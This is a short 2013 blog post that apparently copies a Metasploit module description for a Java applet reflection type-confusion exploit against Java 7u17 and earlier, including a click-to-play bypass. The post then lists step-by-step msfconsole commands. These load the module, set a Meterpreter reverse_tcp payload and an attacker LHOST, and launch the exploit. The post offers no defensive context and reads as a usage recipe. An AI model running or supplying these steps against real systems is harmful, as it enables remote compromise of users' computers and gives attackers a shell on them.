Why don't you help Animal?

Tuesday, April 30, 2013

Java Applet Reflection Type Confusion Remote Code Execution

Java Applet Reflection Type Confusion Remote Code Execution

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.

Exploit Targets

    0 - Generic (Java Payload) (default)
    1 - Windows x86 (Native Payload)
    2 - Mac OS X x86 (Native Payload)
    3 - Linux x86 (Native Payload)


(2)msf > use exploit/multi/browser/java_jre17_reflection_types

(3)msf exploit(java_jre17_reflection_types) > show payloads

(4)msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp

(5)msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]

(6)msf exploit(java_jre17_reflection_types) > exploit

No comments:

Post a Comment